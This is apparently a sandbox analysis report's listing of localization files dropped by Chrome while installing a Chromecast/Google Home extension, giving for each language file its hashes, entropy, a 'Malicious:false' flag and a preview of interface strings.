                                                                                                                                                                                                                        SHA1:617C0D70E162CF380005E9780B61F650B7A39F9B
                                                                                                                                                                                                                        SHA-256:C2C27CA242DBDE600BA3AA7782156BC2B190A64D8A1B51EDC8007BDECA139553
                                                                                                                                                                                                                        SHA-512:9FB91AA8E0226519E298B1136E8A1A3C1879DB7F0E6052AF1BFD55921CD698346278D04602510680A9695A76DD5C96D9665380580044C50D81392BB2CB3E8E95
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "..... ... .. ... .... ....... .. .... ..... ..... .... ..?".. },.. "128276876460319075": {.. "message": "...... ...".. },.. "1428448869078126731": {.. "message": "...... .........".. },.. "1522140683318860351": {.. "message": "....... ..... ..... .... ...... .....".. },.. "1550904064710828958": {.. "message": ".......".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": ".....".. },.. "1850397500312020388": {.. "message": ".... .. $START_LINK$ Google Home .........$END_LINK$ ... .... Ch
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15507
                                                                                                                                                                                                                        Entropy (8bit):5.290847699527565
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Pdapr6h85tRwVQgkvJryLkla5Kfndg/V6c8TEKdl:Arwot2Q7BryVce/V6uml
                                                                                                                                                                                                                        MD5:3ED90E66789927D80B42346BB431431E
                                                                                                                                                                                                                        SHA1:2B061E3271DF4255B1FFC47BDB207CDEC0D9724F
                                                                                                                                                                                                                        SHA-256:0B41E3C42414F72C9A12C05F8772597F9685115366A774C66018467AD4B71A74
                                                                                                                                                                                                                        SHA-512:92BE43F1FFC8EFBF5BBC50573AC4C65F6104416A5B6CD04404C3A9854CA3DCF2A43A4044C168590CDF83887D234495843572331ADCD5B020D2E48A3956F3C164
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Zamrzavanje".. },.. "1213957982723875920": {.. "message": "Koje od sljede.eg najbolje opisuje va.u mre.u?".. },.. "128276876460319075": {.. "message": "Otkrivanje ure.aja".. },.. "1428448869078126731": {.. "message": "Ujedna.enost videoreprodukcije".. },.. "1522140683318860351": {.. "message": "Povezivanje nije uspjelo. Poku.ajte ponovo.".. },.. "1550904064710828958": {.. "message": "Glatko".. },.. "1636686747687494376": {.. "message": "Savr.ena".. },.. "1802762746589457177": {.. "message": "Glasno.a".. },.. "1850397500312020388": {.. "message": "Vidite li svoj Chromecast u $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15682
                                                                                                                                                                                                                        Entropy (8bit):5.354505633120392
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:CCEAproS9fZv+JwkDMrC2NSxoSgbV6c8TEKdl:5r5VZv+RDMrazoV6uml
                                                                                                                                                                                                                        MD5:8E9FF7E49473C5734A2F6F0812E12EB3
                                                                                                                                                                                                                        SHA1:A4F10DDD1580582533D5EB59EDF6D8048F887C81
                                                                                                                                                                                                                        SHA-256:6CDD2FB39ADECE00E88B989E464B05ED1414092D0492F6D0AE58D549BFD1A46A
                                                                                                                                                                                                                        SHA-512:E9A4AF31B1A276F395599BB620A3164CABF3459F3C102DD3F57DFEA734510BD985DE65CB409E1975559ACCC615075439A08E1DEBE22C90A0ABCAA3CAFEE79AC7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Lefagy".. },.. "1213957982723875920": {.. "message": "Az al.bbiak k.z.l melyik jellemzi legjobban h.l.zat.t?".. },.. "128276876460319075": {.. "message": "Eszk.zfelfedez.s".. },.. "1428448869078126731": {.. "message": "Vide. folyamatoss.ga".. },.. "1522140683318860351": {.. "message": "Sikertelen kapcsol.d.s. K.rj.k, pr.b.lja .jra.".. },.. "1550904064710828958": {.. "message": "Folyamatos".. },.. "1636686747687494376": {.. "message": "T.k.letes".. },.. "1802762746589457177": {.. "message": "Hanger.".. },.. "1850397500312020388": {.. "message": "L.tja a Chromecastot a $START_LINK$Google Home alkalmaz.sban$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15070
                                                                                                                                                                                                                        Entropy (8bit):5.190057470347349
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:GsprMtChjkWfrEWL0KRCnEOWV6c8TEKdl:9rtAEr3LTRuWV6uml
                                                                                                                                                                                                                        MD5:7ADF9F2048944821F93879336EB61A78
                                                                                                                                                                                                                        SHA1:C3DA74FB544684D5B250767BB0CB66FFB7C58963
                                                                                                                                                                                                                        SHA-256:3630947E1075E3663AD3E4824D0BE42CB47C0D615D8053E83B9595047C8BA9BE
                                                                                                                                                                                                                        SHA-512:1F28BB80E1839C5581106BEA3AE2501C7618249D7E3115819F5A9A87771D59F5DE346C1B9C87F7FFC390604D5B9888CE738E25F2F04A094002A0FB3B22CBEC95
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Membeku".. },.. "1213957982723875920": {.. "message": "Dari berikut ini, manakah yang paling mendeskripsikan jaringan Anda?".. },.. "128276876460319075": {.. "message": "Penemuan Perangkat".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Coba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Bisakah Anda melihat Chromecast di $START_LINK$aplikasi Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15256
                                                                                                                                                                                                                        Entropy (8bit):5.210663765771143
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:lYprk52dAaykVza8rE0QWBKD9+vq0hKEV6c8TEKdl:qrlA8r6DalV6uml
                                                                                                                                                                                                                        MD5:BB3041A2B485B900F623E57459AE698A
                                                                                                                                                                                                                        SHA1:502F5EA89F9FB0287E864B240EA39889D72053A4
                                                                                                                                                                                                                        SHA-256:025737EF8FA06706B3F26D0F52B4844244A6D33DAE1D82FEF2931A14C003D57E
                                                                                                                                                                                                                        SHA-512:BA51784073BEF82F3A116B33DA406FDB10EC823B9EE74375C46036DAD8BDCB4141F60845DE141ABE42CEEF9251572F6AB287CA5FC7669C60E4F68071D5AB8C2D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Si blocca".. },.. "1213957982723875920": {.. "message": "Quale delle seguenti definizioni descrive meglio la tua rete?".. },.. "128276876460319075": {.. "message": "Rilevamento dispositivi".. },.. "1428448869078126731": {.. "message": "Uniformit. video".. },.. "1522140683318860351": {.. "message": "Connessione non riuscita. Riprova.".. },.. "1550904064710828958": {.. "message": "Fluido".. },.. "1636686747687494376": {.. "message": "Perfetta".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Riesci a vedere il tuo dispositivo Chromecast nell'$START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\iw\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18990
                                                                                                                                                                                                                        Entropy (8bit):4.903564947699091
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:xkQ0XrEGOhGUkT/Mf8eZrNj27tS+iiUfOkGEyWiycLSK8eL+D75J4X:KdrgGvDMEeZrM78fQVLZqDA
                                                                                                                                                                                                                        MD5:A991BEF47A83913A1E0EF06007D09198
                                                                                                                                                                                                                        SHA1:80BA1E8FC3E9BE8A34F73E78CED8313E54F9CC96
                                                                                                                                                                                                                        SHA-256:0F95D8BF550F14B2B704CE42911F5BD23FA9FE28D0D301F66628848B27C760CB
                                                                                                                                                                                                                        SHA-512:1B5C8196669088A884FD8E117E7EB0870B296AF493004F948D0AD4FF630B07A34F423647E55856307029B2B06CDCCEAED2F9C43B426200D28D8A19A48CEA5D42
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {"1018984561488520517": {"message": "\u05e7\u05d5\u05e4\u05d0"}, "1213957982723875920": {"message": "\u05d0\u05d9\u05d6\u05d4 \u05de\u05d4\u05de\u05e9\u05e4\u05d8\u05d9\u05dd \u05d4\u05d1\u05d0\u05d9\u05dd \u05de\u05ea\u05d0\u05e8 \u05d0\u05ea \u05d4\u05e8\u05e9\u05ea \u05e9\u05dc\u05da \u05d1\u05e6\u05d5\u05e8\u05d4 \u05d4\u05d8\u05d5\u05d1\u05d4 \u05d1\u05d9\u05d5\u05ea\u05e8?"}, "128276876460319075": {"message": "\u05d2\u05d9\u05dc\u05d5\u05d9 \u05de\u05db\u05e9\u05d9\u05e8\u05d9\u05dd"}, "1428448869078126731": {"message": "\u05d0\u05d9\u05db\u05d5\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05d5\u05d5\u05d9\u05d3\u05d0\u05d5"}, "1522140683318860351": {"message": "\u05d4\u05d7\u05d9\u05d1\u05d5\u05e8 \u05e0\u05db\u05e9\u05dc. \u05e0\u05e1\u05d4 \u05e9\u05d5\u05d1."}, "1550904064710828958": {"message": "\u05d7\u05dc\u05e7"}, "1636686747687494376": {"message": "\u05de\u05e2\u05d5\u05dc\u05d4"}, "1802762746589457177": {"message": "\u05e2\u05d5\u05e6\u05de\u05ea \u05e7\u05d5\u05dc"}, "
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16519
                                                                                                                                                                                                                        Entropy (8bit):5.675556017051063
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:nkprPhQdxkRWrZe1wYpMR5wnAV6c8TEKdl:YrLRWri65wAV6uml
                                                                                                                                                                                                                        MD5:6F2CC1A6B258DF45F519BA24149FABDC
                                                                                                                                                                                                                        SHA1:8A58C7880C6D22765DCBB6BCE22A192C1B109AE1
                                                                                                                                                                                                                        SHA-256:42ECFEE727CFC4F2845FEFDACE5EDC2E0A40AFAD69973A3B950CE653A7633342
                                                                                                                                                                                                                        SHA-512:F7454F0E14301C59CC54361ACC0A1C6D072EF9BDF5DEA60646FB90B1CE47612785938C784A4CF1DE3E62648A14420374933B5F5DA43907BC00D3799FF163A3D0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": "................................".. },.. "128276876460319075": {.. "message": "......".. },.. "1428448869078126731": {.. "message": ".......".. },.. "1522140683318860351": {.. "message": ".......................".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home ...$END_LINK$. Chromecast .........$START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\kn\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20406
                                                                                                                                                                                                                        Entropy (8bit):5.312117131662377
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:a6C5rBSzvrZreGnla9ZBHRUDYr9yRwEcAa4rSeD5BSz0hJz8qbbM3gbr//Hkr44c:a6C5rBSzvFreGnla9ZBHRUDYr9yRwEcC
                                                                                                                                                                                                                        MD5:2E3239FC277287810BC88D93A6691B09
                                                                                                                                                                                                                        SHA1:FC5D585DA00ADC90BF79109C7377BD55E6653569
                                                                                                                                                                                                                        SHA-256:5FC705AD19761204D8604EA069936A23731B055D51E7836CAAF16AC7719FBEEA
                                                                                                                                                                                                                        SHA-512:DF8BC9E577D3ECB0E6C303E1D2C9E9A4A8317CAE810A9DFC88D91B373A4B665722C5A9AB5A589BB947FDA4C7CD9A6DF39DDD13EA47FE9EFF7E0AC43E49FF3479
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "....... .........".. },.. "1213957982723875920": {.. "message": "...... ...... ..... ........... ..... ......... ............?".. },.. "128276876460319075": {.. "message": "..... ........".. },.. "1428448869078126731": {.. "message": "........ .......".. },.. "1522140683318860351": {.. "message": "...... ........... ........ ..... ...........".. },.. "1550904064710828958": {.. "message": ".....".. },.. "1636686747687494376": {.. "message": ".....".. },.. "1802762746589457177": {.. "message": "........".. },.. "1850397500312020388": {.. "message": ".... $
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15480
                                                                                                                                                                                                                        Entropy (8bit):5.617756574352461
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:kWprGvSQtkxWffrnl5JuFBWVZV6c8TEKdl:TrkuxKfrlT4YVZV6uml
                                                                                                                                                                                                                        MD5:E303CD63AD00EB3154431DED78E871C4
                                                                                                                                                                                                                        SHA1:3B1E5B8E2CF5EBDF5D33656EF80A46563F751783
                                                                                                                                                                                                                        SHA-256:FDE602BFDB1AFD282682DA5338C4F91D8A2F6CB5411DB8F62F4583D629CE67A6
                                                                                                                                                                                                                        SHA-512:18BA1D5A25FBC1829AD957A531B0CC490AFCBD20AC22181021363AA3CFB916270B8732E824463C9B0897220E8AE86EB1BE561D6540E6C625F08F228F61DDFFA3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "...".. },.. "1213957982723875920": {.. "message": ".. . .. .. ..... .. . .... ... .....?".. },.. "128276876460319075": {.. "message": ".. ..".. },.. "1428448869078126731": {.. "message": "... ..".. },.. "1522140683318860351": {.. "message": ".... ...... .. ... ....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "...".. },.. "1802762746589457177": {.. "message": "..".. },.. "1850397500312020388": {.. "message": "$START_LINK$Google Home .$END_LINK$. Chromecast. .....? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\lt\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15802
                                                                                                                                                                                                                        Entropy (8bit):5.354550839818046
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:lGxSprfkiRR+2zJckS1khrnPI85+80p3DWReV6c8TEKdl:lG4rlq0OkSmhrwbpIeV6uml
                                                                                                                                                                                                                        MD5:93BBBE82F024FBCB7FB18E203F253429
                                                                                                                                                                                                                        SHA1:83F4D80F64FA2ADCE6C515C5F663BD38A76C51DB
                                                                                                                                                                                                                        SHA-256:E7A8570922CCC4F2CA3721C4E61F426158C4E7BC90274FBC8BE4040FF8B6CA9B
                                                                                                                                                                                                                        SHA-512:B7E7878106B466CE95069141DF1DE387E847348B62E9C4D548006452F3E164B3AD842E9673A56DC011A5ECC3346B5863E2034EE477A9D1F3E0ABD76B2D0F640A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Stringa".. },.. "1213957982723875920": {.. "message": "Kuris i. toliau pateikt. teigini. geriausiai apib.dina j.s. tinkl.?".. },.. "128276876460319075": {.. "message": ".renginio suradimas".. },.. "1428448869078126731": {.. "message": "Vaizdo .ra.o sklandumas".. },.. "1522140683318860351": {.. "message": ".vyko ry.io klaida. Bandykite dar kart..".. },.. "1550904064710828958": {.. "message": "Leid.iama skland.iai".. },.. "1636686747687494376": {.. "message": "Puiki".. },.. "1802762746589457177": {.. "message": "Garsumas".. },.. "1850397500312020388": {.. "message": "Ar .Chromecast. rodomas $START_LINK$programoje .Google Home.$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\lv\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15891
                                                                                                                                                                                                                        Entropy (8bit):5.36794040601742
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:y18prUkm15wkLDG2raqhnZDuvyI762V6c8TEKdl:RrAL7rte62V6uml
                                                                                                                                                                                                                        MD5:388590CE5E144AE5467FD6585073BD11
                                                                                                                                                                                                                        SHA1:61228673A400A98D5834389C06127589F19D3A30
                                                                                                                                                                                                                        SHA-256:05CA14196CA5D90B228C0F03684E03EBE403A3E7B513AE0A059244AE12B51164
                                                                                                                                                                                                                        SHA-512:BF83AC90BC56CEB1CA12DCB47BCE542FB8CFE0BC14E34DE4FE1A84F7CDB4B54E36C125CEA7EE06EA6244F7795A0957A8A20DB30CA4C60FC6E96EF2A735448521
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": ".Iesald.ts. att.ls".. },.. "1213957982723875920": {.. "message": "Kur. no t.l.k min.tajiem apgalvojumiem vislab.k raksturo j.su t.klu?".. },.. "128276876460319075": {.. "message": "Ier.ces atra.ana".. },.. "1428448869078126731": {.. "message": "Video vienm.r.ba".. },.. "1522140683318860351": {.. "message": "Neizdev.s izveidot savienojumu. L.dzu, m..iniet v.lreiz.".. },.. "1550904064710828958": {.. "message": "Vienm.r.gs att.ls".. },.. "1636686747687494376": {.. "message": "Nevainojama".. },.. "1802762746589457177": {.. "message": "Ska.ums".. },.. "1850397500312020388": {.. "message": "Vai j.su Chromecast ier.ce ir redzama $START_LINK$lietotn. Google.Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2"..
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ml\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20986
                                                                                                                                                                                                                        Entropy (8bit):5.347122984404251
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:6pQrdbhWHZ3wOn1HbxytQdroExFVRnTPV6uml:X5hUtz6uml
                                                                                                                                                                                                                        MD5:2AF93901DE80CA49DA869188BCDA9495
                                                                                                                                                                                                                        SHA1:E60DF4F2FB12BD3F1CA869DAD9F6BDE0C17CEB11
                                                                                                                                                                                                                        SHA-256:329E80AEE1212F634E180DEF7E16D6E38D9C9FDA9AC9DB1D99B8AE1626EF304E
                                                                                                                                                                                                                        SHA-512:DD1711B017DC65E1272972A1BEBD7A1B1769E1F22B37B20582573392CD432725D19DCE134145B3C031428BC0B5948B02A9AA93C8A651BEAA189B686B7BC2AD46
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "...........".. },.. "1213957982723875920": {.. "message": "................ ..... ....... ...... ....... ......... ............. .................?".. },.. "128276876460319075": {.. "message": "...... .........".. },.. "1428448869078126731": {.. "message": "...... ...............".. },.. "1522140683318860351": {.. "message": "...... .............. ....... ...........".. },.. "1550904064710828958": {.. "message": ".........".. },.. "1636686747687494376": {.. "message": "........".. },.. "1802762746589457177": {.. "message"
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\mr\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):19628
                                                                                                                                                                                                                        Entropy (8bit):5.311054092888986
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:PbrpprGy+RmIosTmidpzlF1Akk03LQYOkQrjNjP8hZYiEQ5z+excV6c8TEKdl:PbfrGUIos7dpzxbP7KrjNjaBEYuV6uml
                                                                                                                                                                                                                        MD5:659F5B4ACA112D3ECBB6EC1613DDE824
                                                                                                                                                                                                                        SHA1:5DEE35FCD260554999F8DDEC489FBA9F81FA8EEE
                                                                                                                                                                                                                        SHA-256:C8B765E7A07578BC078A952E151E3B866506959E15E79E9E5E1DBB98F9C4008F
                                                                                                                                                                                                                        SHA-512:F74B36C1B6160E444F4969D13788A9C60637BDC11DC5065B2518B668E8D638384E00557ACDC88B3EA225D9231B6BED4B227BFB2E12C92773073B256F62ADDE63
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "......".. },.. "1213957982723875920": {.. "message": "......... ..... ...... ......... ............ ..... ....?".. },.. "128276876460319075": {.. "message": "........ ...".. },.. "1428448869078126731": {.. "message": "....... .......".. },.. "1522140683318860351": {.. "message": "....... ....... ..... ..... ...... ....... ....".. },.. "1550904064710828958": {.. "message": ".... ..... .....".. },.. "1636686747687494376": {.. "message": "....".. },.. "1802762746589457177": {.. "message": ".........".. },.. "1850397500312020388": {.. "message": "...... $START_LINK$ Goo
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\ms\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15330
                                                                                                                                                                                                                        Entropy (8bit):5.193447909498091
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:rCprBbx+Fkc4kYPr/pEt4EpXlIoV6c8TEKdl:CrYjer/mOE4oV6uml
                                                                                                                                                                                                                        MD5:09D75141E0D80FBD3E9E92CE843DA986
                                                                                                                                                                                                                        SHA1:B24EAB4B1242C31B69514D77BC1DB36A3F648F40
                                                                                                                                                                                                                        SHA-256:8F1DBDEFD910AD88BEEC7956619CDB34391D6E69254C3A7497E8F87134AE8B5C
                                                                                                                                                                                                                        SHA-512:935C69481F1555787FCB9A5490B3188B348284B600359239742A7D802ADD5CC8A30CC1F0942D52E620DFB388787FCD69B548BBAC590110245DF5763367A2DD5A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Tidak bergerak".. },.. "1213957982723875920": {.. "message": "Antara yang berikut, manakah yang terbaik menggambarkan rangkaian anda?".. },.. "128276876460319075": {.. "message": "Penemuan Peranti".. },.. "1428448869078126731": {.. "message": "Kelancaran Video".. },.. "1522140683318860351": {.. "message": "Sambungan gagal. Sila cuba lagi.".. },.. "1550904064710828958": {.. "message": "Lancar".. },.. "1636686747687494376": {.. "message": "Sempurna".. },.. "1802762746589457177": {.. "message": "Kelantangan".. },.. "1850397500312020388": {.. "message": "Adakah anda dapat melihat Chromecast anda dalam $START_LINK$ apl Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content":
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\nb\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15155
                                                                                                                                                                                                                        Entropy (8bit):5.2408655429422515
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:5Pvl9prfckKJ+3kEUroBsL78Z4XyfhV6c8TEKdl:9vhrkDJ+UEUroE78OCJV6uml
                                                                                                                                                                                                                        MD5:ED99169537909291BCC1ED1EA7BB63F0
                                                                                                                                                                                                                        SHA1:5F72D51B6DBE8C622EF33D2B2AEBD7E9E20DAFB3
                                                                                                                                                                                                                        SHA-256:65B6598225ADA1E14EE9CB76CA863708E8F9EE0724B4EDC8F9508532BD631BAB
                                                                                                                                                                                                                        SHA-512:452704BFC109EEBDE7C9D83CFC9EADA7471989CA7D30F5C8754B6C2B026100A87C8D9ED49A09E398CEBA8B837829E2D9C6772EEEAF1AFA506F35BDDF25C20C23
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview: {.. "1018984561488520517": {.. "message": "Fryser".. },.. "1213957982723875920": {.. "message": "Hvilket av f.lgende eksempler beskriver nettverket ditt best?".. },.. "128276876460319075": {.. "message": "Enhetsgjenkjenning".. },.. "1428448869078126731": {.. "message": "Videojevnhet".. },.. "1522140683318860351": {.. "message": "Tilkoblingen mislyktes. Pr.v p. nytt.".. },.. "1550904064710828958": {.. "message": "Jevn".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Ser du Chromecasten din i $START_LINK$Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.. "START_SPAN":
                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7040_1813528464\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
